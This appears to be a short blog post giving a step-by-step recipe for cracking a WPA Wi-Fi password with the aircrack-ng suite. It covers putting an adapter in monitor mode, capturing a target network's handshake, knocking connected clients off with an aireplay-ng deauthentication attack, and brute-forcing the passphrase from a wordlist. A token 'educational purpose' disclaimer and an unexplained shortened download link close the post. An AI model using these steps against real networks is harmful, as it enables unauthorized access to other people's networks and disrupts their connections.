Hack Wifi In Linux And Windows

  1. Download and setup Kali Linux.
  2. Attack your injection-capable wireless adapter.
  3. Disconnect from all the wireless networks.
  4. Open terminal using ctrl+alt+t and type airmon-ng.
  5. Look for the interface of your wireless card in the list.
  6. Type airmon-ng start followed by the interface of your wireless card.
  7. Type ifconfig followed by the interface of your wireless card.
  8. Type airodump-ng followed by the new monitor interface.
  9. A list of all all the wireless networks in your area will appear.
  10. Look for the target network and hit Ctrl + C to stop the process.
  11. Copy the channel and BSSID of the target network.
  12. Type this command and replace the values in square brackets "airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [interface]"
  13. Next, leave airodump-ng running and open a new terminal window.
  14. Type aireplay-ng –0 2 –a [bssid] –c [STATION bssid] [interface].
  15. Close the new terminal and switch back to the previous one.
  16. Now hit Ctrl + C to stop monitoring the target network.
  17. Type aircrack-ng -a2 -b [bssid] –w /root/wpa.txt /root/Desktop/*.cap
  18. Cracking password might take a long time depending on the wordlist.
  19. Now all you need to do is wait for aircrack to do its job.
  20. That’s all, the passphrase will appear on the screen.
  21. For Windows Users Download Linux VM FRom Here.
  22. ENJOY..........
http://sh.st/O6zU6

NOTE :- THIS TRICK IS FOR ONLY EDUCATIONAL PURPOSE. DON'T USE IT FOR ILLEGAL PURPOSE......

IF YOU LIKE IT OR YOU HAVE ANY DOUBT YOU CAN LEAVE A REVIEW THROUGH COMMENT.

THANKS FOR READING............

No comments:

Post a Comment